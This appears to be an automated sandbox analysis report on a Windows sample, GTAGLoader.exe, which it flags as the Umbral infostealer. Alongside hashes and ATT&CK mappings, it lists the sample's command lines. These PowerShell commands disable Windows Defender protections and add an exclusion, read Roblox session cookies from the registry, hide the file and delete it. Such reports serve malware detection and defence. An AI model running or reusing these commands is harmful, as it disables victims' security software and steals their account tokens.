Analysis
-
max time kernel
138s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2024 20:47
Behavioral task
behavioral1
Sample
GTAGLoader.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
GTAGLoader.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
GTAGLoader.exe
-
Size
229KB
-
MD5
18cb3d1a221a079d9b499f2eec3a3e64
-
SHA1
5fb17f7e655b5cb79be1099c8ea550ac1f5ace1f
-
SHA256
e22bde6d04787794012e7e12ceaf1cf8fdf145f81551d90febf6a4f9c5d4e029
-
SHA512
ca4fdb1e0bbf0d63667d5faa71f691efa4f1a629ca391665d0c361ce84876fc2fd0962b3a2c8bb8735e09931cc4401f912dece4e43f325fa8fe56b5c24630b03
-
SSDEEP
6144:lloZM9rIkd8g+EtXHkv/iD4uNKIkqNlO+LWU1pAOqb8e1mSi:noZOL+EP8uNKIkqNlO+LWU1pAxQ
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4104-1-0x000001562F200000-0x000001562F240000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3992 powershell.exe 1904 powershell.exe 3228 powershell.exe 2200 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
GTAGLoader.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts GTAGLoader.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 400 cmd.exe 4308 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3992 powershell.exe 3992 powershell.exe 1904 powershell.exe 1904 powershell.exe 3228 powershell.exe 3228 powershell.exe 3400 powershell.exe 3400 powershell.exe 2200 powershell.exe 2200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
GTAGLoader.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 4104 GTAGLoader.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 3400 powershell.exe Token: SeIncreaseQuotaPrivilege 1600 wmic.exe Token: SeSecurityPrivilege 1600 wmic.exe Token: SeTakeOwnershipPrivilege 1600 wmic.exe Token: SeLoadDriverPrivilege 1600 wmic.exe Token: SeSystemProfilePrivilege 1600 wmic.exe Token: SeSystemtimePrivilege 1600 wmic.exe Token: SeProfSingleProcessPrivilege 1600 wmic.exe Token: SeIncBasePriorityPrivilege 1600 wmic.exe Token: SeCreatePagefilePrivilege 1600 wmic.exe Token: SeBackupPrivilege 1600 wmic.exe Token: SeRestorePrivilege 1600 wmic.exe Token: SeShutdownPrivilege 1600 wmic.exe Token: SeDebugPrivilege 1600 wmic.exe Token: SeSystemEnvironmentPrivilege 1600 wmic.exe Token: SeRemoteShutdownPrivilege 1600 wmic.exe Token: SeUndockPrivilege 1600 wmic.exe Token: SeManageVolumePrivilege 1600 wmic.exe Token: 33 1600 wmic.exe Token: 34 1600 wmic.exe Token: 35 1600 wmic.exe Token: 36 1600 wmic.exe Token: SeIncreaseQuotaPrivilege 1600 wmic.exe Token: SeSecurityPrivilege 1600 wmic.exe Token: SeTakeOwnershipPrivilege 1600 wmic.exe Token: SeLoadDriverPrivilege 1600 wmic.exe Token: SeSystemProfilePrivilege 1600 wmic.exe Token: SeSystemtimePrivilege 1600 wmic.exe Token: SeProfSingleProcessPrivilege 1600 wmic.exe Token: SeIncBasePriorityPrivilege 1600 wmic.exe Token: SeCreatePagefilePrivilege 1600 wmic.exe Token: SeBackupPrivilege 1600 wmic.exe Token: SeRestorePrivilege 1600 wmic.exe Token: SeShutdownPrivilege 1600 wmic.exe Token: SeDebugPrivilege 1600 wmic.exe Token: SeSystemEnvironmentPrivilege 1600 wmic.exe Token: SeRemoteShutdownPrivilege 1600 wmic.exe Token: SeUndockPrivilege 1600 wmic.exe Token: SeManageVolumePrivilege 1600 wmic.exe Token: 33 1600 wmic.exe Token: 34 1600 wmic.exe Token: 35 1600 wmic.exe Token: 36 1600 wmic.exe Token: SeIncreaseQuotaPrivilege 4296 wmic.exe Token: SeSecurityPrivilege 4296 wmic.exe Token: SeTakeOwnershipPrivilege 4296 wmic.exe Token: SeLoadDriverPrivilege 4296 wmic.exe Token: SeSystemProfilePrivilege 4296 wmic.exe Token: SeSystemtimePrivilege 4296 wmic.exe Token: SeProfSingleProcessPrivilege 4296 wmic.exe Token: SeIncBasePriorityPrivilege 4296 wmic.exe Token: SeCreatePagefilePrivilege 4296 wmic.exe Token: SeBackupPrivilege 4296 wmic.exe Token: SeRestorePrivilege 4296 wmic.exe Token: SeShutdownPrivilege 4296 wmic.exe Token: SeDebugPrivilege 4296 wmic.exe Token: SeSystemEnvironmentPrivilege 4296 wmic.exe Token: SeRemoteShutdownPrivilege 4296 wmic.exe Token: SeUndockPrivilege 4296 wmic.exe Token: SeManageVolumePrivilege 4296 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
GTAGLoader.execmd.exedescription pid process target process PID 4104 wrote to memory of 2332 4104 GTAGLoader.exe attrib.exe PID 4104 wrote to memory of 2332 4104 GTAGLoader.exe attrib.exe PID 4104 wrote to memory of 3992 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 3992 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 1904 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 1904 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 3228 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 3228 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 3400 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 3400 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 1600 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 1600 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 4296 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 4296 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 2888 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 2888 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 2200 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 2200 4104 GTAGLoader.exe powershell.exe PID 4104 wrote to memory of 2456 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 2456 4104 GTAGLoader.exe wmic.exe PID 4104 wrote to memory of 400 4104 GTAGLoader.exe cmd.exe PID 4104 wrote to memory of 400 4104 GTAGLoader.exe cmd.exe PID 400 wrote to memory of 4308 400 cmd.exe PING.EXE PID 400 wrote to memory of 4308 400 cmd.exe PING.EXE -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe"C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe"2⤵
- Views/modifies file attributes
PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2200
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2456
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\GTAGLoader.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4308
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD535967cf5ed9a95ec4fe527dd96567a02
SHA16a7439c241a30ec540d5d204e02a4cbb2a464737
SHA2564394552922777081d43fb523126cf176d5a676602a5435713320942034f6b3cf
SHA512419b3c336a67ef964bc166d1267cea146ed5878f98304d6e39fb9a3c0394d75693810a9ddc101cdda5e3196ad7d603df01a3260705cf9ef7cf8d4b252df01f45
-
Filesize
948B
MD51a58f982c18490e622e00d4eb75ace5a
SHA160c30527b74659ecf09089a5a7c02a1df9a71b65
SHA2564b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480
-
Filesize
1KB
MD5d3235ed022a42ec4338123ab87144afa
SHA15058608bc0deb720a585a2304a8f7cf63a50a315
SHA25610663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf
-
Filesize
1KB
MD577fad1dec6867fb7dd395c25c46d8ae5
SHA1abfecfd6c63bb35ec88d98ef210adefc139d793e
SHA25602b0ab469998ac630b421de245ee243599422e7f2c2f9714085fc5b837891784
SHA512ac8d9d660992d076e46ffdb7422d4916789a7ca2f5737c711449f518745dee197ed1c08e50f81f92cb7d2d1ea94fe024e77a8295e1be05c5a49a0fd7495776d3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82